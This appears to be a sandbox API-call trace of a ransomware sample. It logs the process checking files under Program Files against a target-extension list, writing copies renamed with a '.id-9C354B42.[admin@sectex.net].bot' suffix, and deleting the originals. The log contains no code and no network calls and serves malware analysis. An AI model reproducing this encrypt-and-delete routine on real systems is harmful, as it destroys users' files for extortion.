	[0138.924] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338
	[0138.925] GetFileSizeEx (in: hFile=0x338, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2903) returned 1
	[0138.925] CloseHandle (hObject=0x338) returned 1
	[0138.925] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png")) returned 0x20
	[0138.925] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.925] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.925] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.925] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.925] lstrlenW (lpString=".doc") returned 4
	[0138.925] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.925] lstrlenW (lpString=".docx") returned 5
	[0138.925] lstrcmpiW (lpString1=".docx", lpString2="2.png") returned -1
	[0138.925] lstrlenW (lpString=".pdf") returned 4
	[0138.925] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.925] lstrlenW (lpString=".xls") returned 4
	[0138.925] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.926] lstrlenW (lpString=".xlsx") returned 5
	[0138.926] lstrcmpiW (lpString1=".xlsx", lpString2="2.png") returned -1
	[0138.926] lstrlenW (lpString=".ppt") returned 4
	[0138.926] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString=".zip") returned 4
	[0138.926] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.926] lstrlenW (lpString=".rar") returned 4
	[0138.926] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.926] lstrlenW (lpString=".bz2") returned 4
	[0138.926] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString=".7z") returned 3
	[0138.926] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString=".dbf") returned 4
	[0138.926] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString=".1cd") returned 4
	[0138.926] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString=".jpg") returned 4
	[0138.926] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.926] lstrlenW (lpString=".doc") returned 4
	[0138.926] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString=".docx") returned 5
	[0138.926] lstrcmpiW (lpString1=".docx", lpString2="2.png") returned -1
	[0138.926] lstrlenW (lpString=".pdf") returned 4
	[0138.926] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.926] lstrlenW (lpString=".xls") returned 4
	[0138.926] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.927] lstrlenW (lpString=".xlsx") returned 5
	[0138.927] lstrcmpiW (lpString1=".xlsx", lpString2="2.png") returned -1
	[0138.927] lstrlenW (lpString=".ppt") returned 4
	[0138.927] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.927] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.927] lstrlenW (lpString=".zip") returned 4
	[0138.927] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.927] lstrlenW (lpString=".rar") returned 4
	[0138.927] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.927] lstrlenW (lpString=".bz2") returned 4
	[0138.927] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.927] lstrlenW (lpString=".7z") returned 3
	[0138.927] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.927] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.927] lstrlenW (lpString=".dbf") returned 4
	[0138.927] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0138.927] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.927] lstrlenW (lpString=".1cd") returned 4
	[0138.927] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0138.927] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png") returned 75
	[0138.927] lstrlenW (lpString=".jpg") returned 4
	[0138.927] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.927] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.927] lstrlenW (lpString="NavigationLeft_ButtonGraphic.png") returned 32
	[0138.927] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338
	[0138.928] GetFileSizeEx (in: hFile=0x338, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5088) returned 1
	[0138.928] CloseHandle (hObject=0x338) returned 1
	[0138.928] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png")) returned 0x20
	[0138.928] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.928] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.928] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 85
	[0138.928] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 85
	[0138.928] lstrlenW (lpString=".doc") returned 4
	[0138.928] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0138.928] lstrlenW (lpString=".docx") returned 5
	[0138.928] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1
	[0138.928] lstrlenW (lpString=".pdf") returned 4
	[0138.928] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0138.928] lstrlenW (lpString=".xls") returned 4
	[0138.928] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0138.928] lstrlenW (lpString=".xlsx") returned 5
	[0138.928] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1
	[0138.928] lstrlenW (lpString=".ppt") returned 4
	[0138.929] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0138.929] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 85
	[0138.929] lstrlenW (lpString=".zip") returned 4
	[0138.929] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0138.929] lstrlenW (lpString=".rar") returned 4
	[0138.929] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0138.929] lstrlenW (lpString=".bz2") returned 4
	[0138.929] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0138.929] lstrlenW (lpString=".7z") returned 3
	[0138.929] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0138.929] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png") returned 85
	[0138.929] lstrlenW (lpString=".dbf") returned 4
	[0138.929] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0139.768] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.768] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.907] GetLastError () returned 0x0
	[0139.907] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x10c8, lpOverlapped=0x0) returned 1
	[0139.936] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x10d0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x10d0, lpOverlapped=0x0) returned 1
	[0139.937] ReadFile (in: hFile=0x3a0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.937] WriteFile (in: hFile=0x398, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.937] SetEndOfFile (hFile=0x398) returned 1
	[0139.937] CloseHandle (hObject=0x398) returned 1
	[0139.937] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.937] SetEndOfFile (hFile=0x3a0) returned 1
	[0139.939] CloseHandle (hObject=0x3a0) returned 1
	[0139.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.944] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04332_.wmf")) returned 1
	[0139.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.947] lstrlenW (lpString=".doc") returned 4
	[0139.947] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.947] lstrlenW (lpString=".docx") returned 5
	[0139.947] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.948] lstrlenW (lpString=".pdf") returned 4
	[0139.948] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString=".xls") returned 4
	[0139.948] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.948] lstrlenW (lpString=".xlsx") returned 5
	[0139.948] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.948] lstrlenW (lpString=".ppt") returned 4
	[0139.948] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString=".zip") returned 4
	[0139.948] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.948] lstrlenW (lpString=".rar") returned 4
	[0139.948] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString=".bz2") returned 4
	[0139.948] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString=".7z") returned 3
	[0139.948] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString=".dbf") returned 4
	[0139.948] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString=".1cd") returned 4
	[0139.948] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString=".jpg") returned 4
	[0139.948] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.948] lstrlenW (lpString=".doc") returned 4
	[0139.948] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.948] lstrlenW (lpString=".docx") returned 5
	[0139.948] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.948] lstrlenW (lpString=".pdf") returned 4
	[0139.948] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString=".xls") returned 4
	[0139.949] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.949] lstrlenW (lpString=".xlsx") returned 5
	[0139.949] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.949] lstrlenW (lpString=".ppt") returned 4
	[0139.949] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.949] lstrlenW (lpString=".zip") returned 4
	[0139.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.949] lstrlenW (lpString=".rar") returned 4
	[0139.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString=".bz2") returned 4
	[0139.949] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString=".7z") returned 3
	[0139.949] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.949] lstrlenW (lpString=".dbf") returned 4
	[0139.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.949] lstrlenW (lpString=".1cd") returned 4
	[0139.949] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 63
	[0139.949] lstrlenW (lpString=".jpg") returned 4
	[0139.949] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.949] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.949] lstrlenW (lpString="BD00160_.WMF") returned 12
	[0139.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.950] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=22516) returned 1
	[0139.950] CloseHandle (hObject=0x398) returned 1
	[0139.950] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 0x20
	[0139.951] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.951] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.951] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0139.954] GetLastError () returned 0x0
	[0139.954] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x57f4, lpOverlapped=0x0) returned 1
	[0139.955] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x5800, lpOverlapped=0x0) returned 1
	[0139.957] ReadFile (in: hFile=0x398, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0139.957] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0139.957] SetEndOfFile (hFile=0x39c) returned 1
	[0139.957] CloseHandle (hObject=0x39c) returned 1
	[0139.957] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0139.957] SetEndOfFile (hFile=0x398) returned 1
	[0139.960] CloseHandle (hObject=0x398) returned 1
	[0139.960] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0139.960] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf")) returned 1
	[0139.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.961] lstrlenW (lpString=".doc") returned 4
	[0139.961] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString=".docx") returned 5
	[0139.961] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.961] lstrlenW (lpString=".pdf") returned 4
	[0139.961] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString=".xls") returned 4
	[0139.961] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.961] lstrlenW (lpString=".xlsx") returned 5
	[0139.961] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.961] lstrlenW (lpString=".ppt") returned 4
	[0139.961] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.961] lstrlenW (lpString=".zip") returned 4
	[0139.961] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.961] lstrlenW (lpString=".rar") returned 4
	[0139.961] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString=".bz2") returned 4
	[0139.961] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString=".7z") returned 3
	[0139.961] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.961] lstrlenW (lpString=".dbf") returned 4
	[0139.961] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.961] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.961] lstrlenW (lpString=".1cd") returned 4
	[0139.962] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString=".jpg") returned 4
	[0139.962] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString=".doc") returned 4
	[0139.962] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString=".docx") returned 5
	[0139.962] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0139.962] lstrlenW (lpString=".pdf") returned 4
	[0139.962] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString=".xls") returned 4
	[0139.962] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0139.962] lstrlenW (lpString=".xlsx") returned 5
	[0139.962] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0139.962] lstrlenW (lpString=".ppt") returned 4
	[0139.962] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString=".zip") returned 4
	[0139.962] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0139.962] lstrlenW (lpString=".rar") returned 4
	[0139.962] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString=".bz2") returned 4
	[0139.962] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString=".7z") returned 3
	[0139.962] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString=".dbf") returned 4
	[0139.962] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.962] lstrlenW (lpString=".1cd") returned 4
	[0139.962] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0139.962] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 63
	[0139.963] lstrlenW (lpString=".jpg") returned 4
	[0139.963] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0139.963] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0139.963] lstrlenW (lpString="BD00173_.WMF") returned 12
	[0139.963] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0139.963] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=16180) returned 1
	[0139.963] CloseHandle (hObject=0x398) returned 1
	[0139.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf")) returned 0x20
